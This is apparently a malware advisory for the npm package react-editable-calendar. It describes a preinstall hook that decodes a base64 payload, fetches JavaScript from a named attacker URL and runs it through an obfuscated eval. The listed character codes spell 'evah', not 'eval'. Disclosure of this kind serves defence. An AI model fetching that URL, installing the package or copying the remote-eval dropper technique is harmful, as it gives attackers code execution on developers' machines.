—

MAL-2026-6547

Malicious code in react-editable-calendar (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9b35fd7baa18320cbcaf6fbb6fbabb6139dd48264cd1f09d0461a8877c1f873f) On `npm install`, the package's preinstall hook runs `node dist/index.d.js`. That file base64-decodes a payload which fetches JavaScript from `https://everydaynodechecker-39143n.vercel.app/api/key?mem=master` and passes the response to `eval`. The `eval` identifier is obfuscated by constructing it from character codes [101,118,97,104] and invoking it via `globalThis[tag](text)` rather than appearing as a literal in source. The result is arbitrary attacker-controlled JavaScript execution on the installer's machine at install time, from an anonymous third-party host. The package name mimics common React calendar component naming and ships empty author metadata, with a minimal dist tree whose only auto-executed code is the remote-eval dropper.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / react-editable-calendar

Introduced in: 0

No fixed version published yet for react-editable-calendar (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/react-editable-calendar/v/0.1.7 [PACKAGE]